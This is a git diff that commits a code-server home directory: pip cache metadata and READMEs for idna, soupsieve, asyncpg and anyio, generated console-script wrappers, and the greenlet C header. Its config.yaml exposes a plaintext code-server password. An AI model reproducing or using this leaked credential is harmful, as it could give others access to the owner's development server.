b/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f new file mode 100755 index 0000000..f17a5db Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f differ diff --git a/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f.body b/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f.body new file mode 100755 index 0000000..7a4a4b7 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f.body @@ -0,0 +1,209 @@ +Metadata-Version: 2.4 +Name: idna +Version: 3.11 +Summary: Internationalized Domain Names in Applications (IDNA) +Author-email: Kim Davies +Requires-Python: >=3.8 +Description-Content-Type: text/x-rst +License-Expression: BSD-3-Clause +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Intended Audience :: System Administrators +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet :: Name Service (DNS) +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Topic :: Utilities +License-File: LICENSE.md +Requires-Dist: ruff >= 0.6.2 ; extra == "all" +Requires-Dist: mypy >= 1.11.2 ; extra == "all" +Requires-Dist: pytest >= 8.3.2 ; extra == "all" +Requires-Dist: flake8 >= 7.1.1 ; extra == "all" +Project-URL: Changelog, https://github.com/kjd/idna/blob/master/HISTORY.rst +Project-URL: Issue tracker, https://github.com/kjd/idna/issues +Project-URL: Source, https://github.com/kjd/idna +Provides-Extra: all + +Internationalized Domain Names in Applications (IDNA) +===================================================== + +Support for `Internationalized Domain Names in +Applications (IDNA) `_ +and `Unicode IDNA Compatibility Processing +`_. + +The latest versions of these standards supplied here provide +more comprehensive language coverage and reduce the potential of +allowing domains with known security vulnerabilities. This library +is a suitable replacement for the “encodings.idna” +module that comes with the Python standard library, but which +only supports an older superseded IDNA specification from 2003. + +Basic functions are simply executed: + +.. code-block:: pycon + + >>> import idna + >>> idna.encode('ドメイン.テスト') + b'xn--eckwd4c7c.xn--zckzah' + >>> print(idna.decode('xn--eckwd4c7c.xn--zckzah')) + ドメイン.テスト + + +Installation +------------ + +This package is available for installation from PyPI via the +typical mechanisms, such as: + +.. code-block:: bash + + $ python3 -m pip install idna + + +Usage +----- + +For typical usage, the ``encode`` and ``decode`` functions will take a +domain name argument and perform a conversion to ASCII compatible encoding +(known as A-labels), or to Unicode strings (known as U-labels) +respectively. + +.. code-block:: pycon + + >>> import idna + >>> idna.encode('ドメイン.テスト') + b'xn--eckwd4c7c.xn--zckzah' + >>> print(idna.decode('xn--eckwd4c7c.xn--zckzah')) + ドメイン.テスト + +Conversions can be applied at a per-label basis using the ``ulabel`` or +``alabel`` functions if necessary: + +.. code-block:: pycon + + >>> idna.alabel('测试') + b'xn--0zwm56d' + + +Compatibility Mapping (UTS #46) ++++++++++++++++++++++++++++++++ + +This library provides support for `Unicode IDNA Compatibility +Processing `_ which normalizes input from +different potential ways a user may input a domain prior to performing the IDNA +conversion operations. This functionality, known as a +`mapping `_, is considered by the +specification to be a local user-interface issue distinct from IDNA +conversion functionality. + +For example, “Königsgäßchen” is not a permissible label as *LATIN +CAPITAL LETTER K* is not allowed (nor are capital letters in general). +UTS 46 will convert this into lower case prior to applying the IDNA +conversion. + +.. code-block:: pycon + + >>> import idna + >>> idna.encode('Königsgäßchen') + ... + idna.core.InvalidCodepoint: Codepoint U+004B at position 1 of 'Königsgäßchen' not allowed + >>> idna.encode('Königsgäßchen', uts46=True) + b'xn--knigsgchen-b4a3dun' + >>> print(idna.decode('xn--knigsgchen-b4a3dun')) + königsgäßchen + + +Exceptions +---------- + +All errors raised during the conversion following the specification +should raise an exception derived from the ``idna.IDNAError`` base +class. + +More specific exceptions that may be generated as ``idna.IDNABidiError`` +when the error reflects an illegal combination of left-to-right and +right-to-left characters in a label; ``idna.InvalidCodepoint`` when +a specific codepoint is an illegal character in an IDN label (i.e. +INVALID); and ``idna.InvalidCodepointContext`` when the codepoint is +illegal based on its position in the string (i.e. it is CONTEXTO or CONTEXTJ +but the contextual requirements are not satisfied.) + +Building and Diagnostics +------------------------ + +The IDNA and UTS 46 functionality relies upon pre-calculated lookup +tables for performance. These tables are derived from computing against +eligibility criteria in the respective standards using the command-line +script ``tools/idna-data``. + +This tool will fetch relevant codepoint data from the Unicode repository +and perform the required calculations to identify eligibility. There are +three main modes: + +* ``idna-data make-libdata``. Generates ``idnadata.py`` and + ``uts46data.py``, the pre-calculated lookup tables used for IDNA and + UTS 46 conversions. Implementers who wish to track this library against + a different Unicode version may use this tool to manually generate a + different version of the ``idnadata.py`` and ``uts46data.py`` files. + +* ``idna-data make-table``. Generate a table of the IDNA disposition + (e.g. PVALID, CONTEXTJ, CONTEXTO) in the format found in Appendix + B.1 of RFC 5892 and the pre-computed tables published by `IANA + `_. + +* ``idna-data U+0061``. Prints debugging output on the various + properties associated with an individual Unicode codepoint (in this + case, U+0061), that are used to assess the IDNA and UTS 46 status of a + codepoint. This is helpful in debugging or analysis. + +The tool accepts a number of arguments, described using ``idna-data +-h``. Most notably, the ``--version`` argument allows the specification +of the version of Unicode to be used in computing the table data. For +example, ``idna-data --version 9.0.0 make-libdata`` will generate +library data against Unicode 9.0.0. + + +Additional Notes +---------------- + +* **Packages**. The latest tagged release version is published in the + `Python Package Index `_. + +* **Version support**. This library supports Python 3.8 and higher. + As this library serves as a low-level toolkit for a variety of + applications, many of which strive for broad compatibility with older + Python versions, there is no rush to remove older interpreter support. + Support for older versions are likely to be removed from new releases + as automated tests can no longer easily be run, i.e. once the Python + version is officially end-of-life. + +* **Testing**. The library has a test suite based on each rule of the + IDNA specification, as well as tests that are provided as part of the + Unicode Technical Standard 46, `Unicode IDNA Compatibility Processing + `_. + +* **Emoji**. It is an occasional request to support emoji domains in + this library. Encoding of symbols like emoji is expressly prohibited by + the technical standard IDNA 2008 and emoji domains are broadly phased + out across the domain industry due to associated security risks. For + now, applications that need to support these non-compliant labels + may wish to consider trying the encode/decode operation in this library + first, and then falling back to using `encodings.idna`. See `the Github + project `_ for more discussion. + +* **Transitional processing**. Unicode 16.0.0 removed transitional + processing so the `transitional` argument for the encode() method + no longer has any effect and will be removed at a later date. + diff --git a/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e b/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e new file mode 100755 index 0000000..0a1e436 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e differ diff --git a/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e.body b/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e.body new file mode 100755 index 0000000..6c9dccf --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e.body @@ -0,0 +1,115 @@ +Metadata-Version: 2.4 +Name: soupsieve +Version: 2.8.3 +Summary: A modern CSS selector implementation for Beautiful Soup. +Project-URL: Homepage, https://github.com/facelessuser/soupsieve +Author-email: Isaac Muse +License-Expression: MIT +License-File: LICENSE.md +Keywords: CSS,HTML,XML,filter,query,selector,soup +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Console +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Typing :: Typed +Requires-Python: >=3.9 +Description-Content-Type: text/markdown + +[![Donate via PayPal][donate-image]][donate-link] +[![Build][github-ci-image]][github-ci-link] +[![Coverage Status][codecov-image]][codecov-link] +[![PyPI Version][pypi-image]][pypi-link] +[![PyPI Downloads][pypi-down]][pypi-link] +[![PyPI - Python Version][python-image]][pypi-link] +[![License][license-image-mit]][license-link] + +# Soup Sieve + +## Overview + +Soup Sieve is a CSS selector library designed to be used with [Beautiful Soup 4][bs4]. It aims to provide selecting, +matching, and filtering using modern CSS selectors. Soup Sieve currently provides selectors from the CSS level 1 +specifications up through the latest CSS level 4 drafts and beyond (though some are not yet implemented). + +Soup Sieve was written with the intent to replace Beautiful Soup's builtin select feature, and as of Beautiful Soup +version 4.7.0, it now is :confetti_ball:. Soup Sieve can also be imported in order to use its API directly for +more controlled, specialized parsing. + +Soup Sieve has implemented most of the CSS selectors up through the latest CSS draft specifications, though there are a +number that don't make sense in a non-browser environment. Selectors that cannot provide meaningful functionality simply +do not match anything. Some of the supported selectors are: + +- `.classes` +- `#ids` +- `[attributes=value]` +- `parent child` +- `parent > child` +- `sibling ~ sibling` +- `sibling + sibling` +- `:not(element.class, element2.class)` +- `:is(element.class, element2.class)` +- `parent:has(> child)` +- and [many more](https://facelessuser.github.io/soupsieve/selectors/) + + +## Installation + +You must have Beautiful Soup already installed: + +``` +pip install beautifulsoup4 +``` + +In most cases, assuming you've installed version 4.7.0, that should be all you need to do, but if you've installed via +some alternative method, and Soup Sieve is not automatically installed, you can install it directly: + +``` +pip install soupsieve +``` + +If you want to manually install it from source, first ensure that [`build`](https://pypi.org/project/build/) is +installed: + +``` +pip install build +``` + +Then navigate to the root of the project and build the wheel and install (replacing `` with the current version): + +``` +python -m build -w +pip install dist/soupsieve--py3-none-any.whl +``` + +## Documentation + +Documentation is found here: https://facelessuser.github.io/soupsieve/. + +## License + +MIT + +[bs4]: https://beautiful-soup-4.readthedocs.io/en/latest/# + +[github-ci-image]: https://github.com/facelessuser/soupsieve/workflows/build/badge.svg +[github-ci-link]: https://github.com/facelessuser/soupsieve/actions?query=workflow%3Abuild+branch%3Amain +[codecov-image]: https://img.shields.io/codecov/c/github/facelessuser/soupsieve/master.svg?logo=codecov&logoColor=aaaaaa&labelColor=333333 +[codecov-link]: https://codecov.io/github/facelessuser/soupsieve +[pypi-image]: https://img.shields.io/pypi/v/soupsieve.svg?logo=pypi&logoColor=aaaaaa&labelColor=333333 +[pypi-down]: https://img.shields.io/pypi/dm/soupsieve.svg?logo=pypi&logoColor=aaaaaa&labelColor=333333 +[pypi-link]: https://pypi.python.org/pypi/soupsieve +[python-image]: https://img.shields.io/pypi/pyversions/soupsieve?logo=python&logoColor=aaaaaa&labelColor=333333 +[license-image-mit]: https://img.shields.io/badge/license-MIT-blue.svg?labelColor=333333 +[license-link]: https://github.com/facelessuser/soupsieve/blob/main/LICENSE.md +[donate-image]: https://img.shields.io/badge/Donate-PayPal-3fabd1?logo=paypal +[donate-link]: https://www.paypal.me/facelessuser diff --git a/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1 b/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1 new file mode 100755 index 0000000..3999213 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1 differ diff --git a/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1.body b/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1.body new file mode 100755 index 0000000..fd04670 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1.body @@ -0,0 +1,131 @@ +Metadata-Version: 2.4 +Name: asyncpg +Version: 0.31.0 +Summary: An asyncio PostgreSQL driver +Author-email: MagicStack Inc +License-Expression: Apache-2.0 +Project-URL: github, https://github.com/MagicStack/asyncpg +Keywords: database,postgres +Classifier: Development Status :: 5 - Production/Stable +Classifier: Framework :: AsyncIO +Classifier: Intended Audience :: Developers +Classifier: Operating System :: POSIX +Classifier: Operating System :: MacOS :: MacOS X +Classifier: Operating System :: Microsoft :: Windows +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Free Threading :: 2 - Beta +Classifier: Topic :: Database :: Front-Ends +Requires-Python: >=3.9.0 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: async_timeout>=4.0.3; python_version < "3.11.0" +Provides-Extra: gssauth +Requires-Dist: gssapi; platform_system != "Windows" and extra == "gssauth" +Requires-Dist: sspilib; platform_system == "Windows" and extra == "gssauth" +Dynamic: license-file + +asyncpg -- A fast PostgreSQL Database Client Library for Python/asyncio +======================================================================= + +.. image:: https://github.com/MagicStack/asyncpg/workflows/Tests/badge.svg + :target: https://github.com/MagicStack/asyncpg/actions?query=workflow%3ATests+branch%3Amaster + :alt: GitHub Actions status +.. image:: https://img.shields.io/pypi/v/asyncpg.svg + :target: https://pypi.python.org/pypi/asyncpg + +**asyncpg** is a database interface library designed specifically for +PostgreSQL and Python/asyncio. asyncpg is an efficient, clean implementation +of PostgreSQL server binary protocol for use with Python's ``asyncio`` +framework. You can read more about asyncpg in an introductory +`blog post `_. + +asyncpg requires Python 3.9 or later and is supported for PostgreSQL +versions 9.5 to 18. Other PostgreSQL versions or other databases +implementing the PostgreSQL protocol *may* work, but are not being +actively tested. + + +Documentation +------------- + +The project documentation can be found +`here `_. + + +Performance +----------- + +In our testing asyncpg is, on average, **5x** faster than psycopg3. + +.. image:: https://raw.githubusercontent.com/MagicStack/asyncpg/master/performance.png?fddca40ab0 + :target: https://gistpreview.github.io/?0ed296e93523831ea0918d42dd1258c2 + +The above results are a geometric mean of benchmarks obtained with PostgreSQL +`client driver benchmarking toolbench `_ +in June 2023 (click on the chart to see full details). + + +Features +-------- + +asyncpg implements PostgreSQL server protocol natively and exposes its +features directly, as opposed to hiding them behind a generic facade +like DB-API. + +This enables asyncpg to have easy-to-use support for: + +* **prepared statements** +* **scrollable cursors** +* **partial iteration** on query results +* automatic encoding and decoding of composite types, arrays, + and any combination of those +* straightforward support for custom data types + + +Installation +------------ + +asyncpg is available on PyPI. When not using GSSAPI/SSPI authentication it +has no dependencies. Use pip to install:: + + $ pip install asyncpg + +If you need GSSAPI/SSPI authentication, use:: + + $ pip install 'asyncpg[gssauth]' + +For more details, please `see the documentation +`_. + + +Basic Usage +----------- + +.. code-block:: python + + import asyncio + import asyncpg + + async def run(): + conn = await asyncpg.connect(user='user', password='password', + database='database', host='127.0.0.1') + values = await conn.fetch( + 'SELECT * FROM mytable WHERE id = $1', + 10, + ) + await conn.close() + + asyncio.run(run()) + + +License +------- + +asyncpg is developed and distributed under the Apache 2.0 license. diff --git a/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f b/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f new file mode 100755 index 0000000..340ad5a Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f differ diff --git a/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f.body b/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f.body new file mode 100755 index 0000000..5fec9ca Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f.body differ diff --git a/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc b/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc new file mode 100755 index 0000000..82c90da Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc differ diff --git a/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc.body b/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc.body new file mode 100755 index 0000000..a53f272 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc.body differ diff --git a/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c b/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c new file mode 100755 index 0000000..9687aa5 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c differ diff --git a/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c.body b/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c.body new file mode 100755 index 0000000..66ce9f9 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c.body differ diff --git a/code-server-config/.config/code-server/config.yaml b/code-server-config/.config/code-server/config.yaml new file mode 100755 index 0000000..3b58bf3 --- /dev/null +++ b/code-server-config/.config/code-server/config.yaml @@ -0,0 +1,4 @@ +bind-addr: 127.0.0.1:8080 +auth: password +password: ae12057fa11dcf48ceda7d66 +cert: false diff --git a/code-server-config/.local/bin/dotenv b/code-server-config/.local/bin/dotenv new file mode 100755 index 0000000..5f2f190 --- /dev/null +++ b/code-server-config/.local/bin/dotenv @@ -0,0 +1,8 @@ +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +import re +import sys +from dotenv.__main__ import cli +if __name__ == '__main__': + sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) + sys.exit(cli()) diff --git a/code-server-config/.local/bin/httpx b/code-server-config/.local/bin/httpx new file mode 100755 index 0000000..f509dcd --- /dev/null +++ b/code-server-config/.local/bin/httpx @@ -0,0 +1,8 @@ +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +import re +import sys +from httpx import main +if __name__ == '__main__': + sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) + sys.exit(main()) diff --git a/code-server-config/.local/include/python3.12/greenlet/greenlet.h b/code-server-config/.local/include/python3.12/greenlet/greenlet.h new file mode 100755 index 0000000..d02a16e --- /dev/null +++ b/code-server-config/.local/include/python3.12/greenlet/greenlet.h @@ -0,0 +1,164 @@ +/* -*- indent-tabs-mode: nil; tab-width: 4; -*- */ + +/* Greenlet object interface */ + +#ifndef Py_GREENLETOBJECT_H +#define Py_GREENLETOBJECT_H + + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/* This is deprecated and undocumented. It does not change. */ +#define GREENLET_VERSION "1.0.0" + +#ifndef GREENLET_MODULE +#define implementation_ptr_t void* +#endif + +typedef struct _greenlet { + PyObject_HEAD + PyObject* weakreflist; + PyObject* dict; + implementation_ptr_t pimpl; +} PyGreenlet; + +#define PyGreenlet_Check(op) (op && PyObject_TypeCheck(op, &PyGreenlet_Type)) + + +/* C API functions */ + +/* Total number of symbols that are exported */ +#define PyGreenlet_API_pointers 12 + +#define PyGreenlet_Type_NUM 0 +#define PyExc_GreenletError_NUM 1 +#define PyExc_GreenletExit_NUM 2 + +#define PyGreenlet_New_NUM 3 +#define PyGreenlet_GetCurrent_NUM 4 +#define PyGreenlet_Throw_NUM 5 +#define PyGreenlet_Switch_NUM 6 +#define PyGreenlet_SetParent_NUM 7 + +#define PyGreenlet_MAIN_NUM 8 +#define PyGreenlet_STARTED_NUM 9 +#define PyGreenlet_ACTIVE_NUM 10 +#define PyGreenlet_GET_PARENT_NUM 11 + +#ifndef GREENLET_MODULE +/* This section is used by modules that uses the greenlet C API */ +static void** _PyGreenlet_API = NULL; + +# define PyGreenlet_Type \ + (*(PyTypeObject*)_PyGreenlet_API[PyGreenlet_Type_NUM]) + +# define PyExc_GreenletError \ + ((PyObject*)_PyGreenlet_API[PyExc_GreenletError_NUM]) + +# define PyExc_GreenletExit \ + ((PyObject*)_PyGreenlet_API[PyExc_GreenletExit_NUM]) + +/* + * PyGreenlet_New(PyObject *args) + * + * greenlet.greenlet(run, parent=None) + */ +# define PyGreenlet_New \ + (*(PyGreenlet * (*)(PyObject * run, PyGreenlet * parent)) \ + _PyGreenlet_API[PyGreenlet_New_NUM]) + +/* + * PyGreenlet_GetCurrent(void) + * + * greenlet.getcurrent() + */ +# define PyGreenlet_GetCurrent \ + (*(PyGreenlet * (*)(void)) _PyGreenlet_API[PyGreenlet_GetCurrent_NUM]) + +/* + * PyGreenlet_Throw( + * PyGreenlet *greenlet, + * PyObject *typ, + * PyObject *val, + * PyObject *tb) + * + * g.throw(...) + */ +# define PyGreenlet_Throw \ + (*(PyObject * (*)(PyGreenlet * self, \ + PyObject * typ, \ + PyObject * val, \ + PyObject * tb)) \ + _PyGreenlet_API[PyGreenlet_Throw_NUM]) + +/* + * PyGreenlet_Switch(PyGreenlet *greenlet, PyObject *args) + * + * g.switch(*args, **kwargs) + */ +# define PyGreenlet_Switch \ + (*(PyObject * \ + (*)(PyGreenlet * greenlet, PyObject * args, PyObject * kwargs)) \ + _PyGreenlet_API[PyGreenlet_Switch_NUM]) + +/* + * PyGreenlet_SetParent(PyObject *greenlet, PyObject *new_parent) + * + * g.parent = new_parent + */ +# define PyGreenlet_SetParent \ + (*(int (*)(PyGreenlet * greenlet, PyGreenlet * nparent)) \ + _PyGreenlet_API[PyGreenlet_SetParent_NUM]) + +/* + * PyGreenlet_GetParent(PyObject* greenlet) + * + * return greenlet.parent; + * + * This could return NULL even if there is no exception active. + * If it does not return NULL, you are responsible for decrementing the + * reference count. + */ +# define PyGreenlet_GetParent \ + (*(PyGreenlet* (*)(PyGreenlet*)) \ + _PyGreenlet_API[PyGreenlet_GET_PARENT_NUM]) + +/* + * deprecated, undocumented alias. + */ +# define PyGreenlet_GET_PARENT PyGreenlet_GetParent + +# define PyGreenlet_MAIN \ + (*(int (*)(PyGreenlet*)) \ + _PyGreenlet_API[PyGreenlet_MAIN_NUM]) + +# define PyGreenlet_STARTED \ + (*(int (*)(PyGreenlet*)) \ + _PyGreenlet_API[PyGreenlet_STARTED_NUM]) + +# define PyGreenlet_ACTIVE \ + (*(int (*)(PyGreenlet*)) \ + _PyGreenlet_API[PyGreenlet_ACTIVE_NUM]) + + + + +/* Macro that imports greenlet and initializes C API */ +/* NOTE: This has actually moved to ``greenlet._greenlet._C_API``, but we + keep the older definition to be sure older code that might have a copy of + the header still works. */ +# define PyGreenlet_Import() \ + { \ + _PyGreenlet_API = (void**)PyCapsule_Import("greenlet._C_API", 0); \ + } + +#endif /* GREENLET_MODULE */ + +#ifdef __cplusplus +} +#endif +#endif /* !Py_GREENLETOBJECT_H */ diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/INSTALLER b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/INSTALLER new file mode 100755 index 0000000..a1b589e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/METADATA b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/METADATA new file mode 100755 index 0000000..dbeb198 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/METADATA @@ -0,0 +1,96 @@ +Metadata-Version: 2.4 +Name: anyio +Version: 4.12.1 +Summary: High-level concurrency and networking framework on top of asyncio or Trio +Author-email: Alex Grönholm +License-Expression: MIT +Project-URL: Documentation, https://anyio.readthedocs.io/en/latest/ +Project-URL: Changelog, https://anyio.readthedocs.io/en/stable/versionhistory.html +Project-URL: Source code, https://github.com/agronholm/anyio +Project-URL: Issue tracker, https://github.com/agronholm/anyio/issues +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Framework :: AnyIO +Classifier: Typing :: Typed +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Requires-Python: >=3.9 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: exceptiongroup>=1.0.2; python_version < "3.11" +Requires-Dist: idna>=2.8 +Requires-Dist: typing_extensions>=4.5; python_version < "3.13" +Provides-Extra: trio +Requires-Dist: trio>=0.32.0; python_version >= "3.10" and extra == "trio" +Requires-Dist: trio>=0.31.0; python_version < "3.10" and extra == "trio" +Dynamic: license-file + +.. image:: https://github.com/agronholm/anyio/actions/workflows/test.yml/badge.svg + :target: https://github.com/agronholm/anyio/actions/workflows/test.yml + :alt: Build Status +.. image:: https://coveralls.io/repos/github/agronholm/anyio/badge.svg?branch=master + :target: https://coveralls.io/github/agronholm/anyio?branch=master + :alt: Code Coverage +.. image:: https://readthedocs.org/projects/anyio/badge/?version=latest + :target: https://anyio.readthedocs.io/en/latest/?badge=latest + :alt: Documentation +.. image:: https://badges.gitter.im/gitterHQ/gitter.svg + :target: https://gitter.im/python-trio/AnyIO + :alt: Gitter chat + +AnyIO is an asynchronous networking and concurrency library that works on top of either asyncio_ or +Trio_. It implements Trio-like `structured concurrency`_ (SC) on top of asyncio and works in harmony +with the native SC of Trio itself. + +Applications and libraries written against AnyIO's API will run unmodified on either asyncio_ or +Trio_. AnyIO can also be adopted into a library or application incrementally – bit by bit, no full +refactoring necessary. It will blend in with the native libraries of your chosen backend. + +To find out why you might want to use AnyIO's APIs instead of asyncio's, you can read about it +`here `_. + +Documentation +------------- + +View full documentation at: https://anyio.readthedocs.io/ + +Features +-------- + +AnyIO offers the following functionality: + +* Task groups (nurseries_ in trio terminology) +* High-level networking (TCP, UDP and UNIX sockets) + + * `Happy eyeballs`_ algorithm for TCP connections (more robust than that of asyncio on Python + 3.8) + * async/await style UDP sockets (unlike asyncio where you still have to use Transports and + Protocols) + +* A versatile API for byte streams and object streams +* Inter-task synchronization and communication (locks, conditions, events, semaphores, object + streams) +* Worker threads +* Subprocesses +* Subinterpreter support for code parallelization (on Python 3.13 and later) +* Asynchronous file I/O (using worker threads) +* Signal handling +* Asynchronous version of the functools_ module + +AnyIO also comes with its own pytest_ plugin which also supports asynchronous fixtures. +It even works with the popular Hypothesis_ library. + +.. _asyncio: https://docs.python.org/3/library/asyncio.html +.. _Trio: https://github.com/python-trio/trio +.. _structured concurrency: https://en.wikipedia.org/wiki/Structured_concurrency +.. _nurseries: https://trio.readthedocs.io/en/stable/reference-core.html#nurseries-and-spawning +.. _Happy eyeballs: https://en.wikipedia.org/wiki/Happy_Eyeballs +.. _pytest: https://docs.pytest.org/en/latest/ +.. _functools: https://docs.python.org/3/library/functools.html +.. _Hypothesis: https://hypothesis.works/ diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/RECORD b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/RECORD new file mode 100755 index 0000000..4b3b57c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/RECORD @@ -0,0 +1,92 @@ 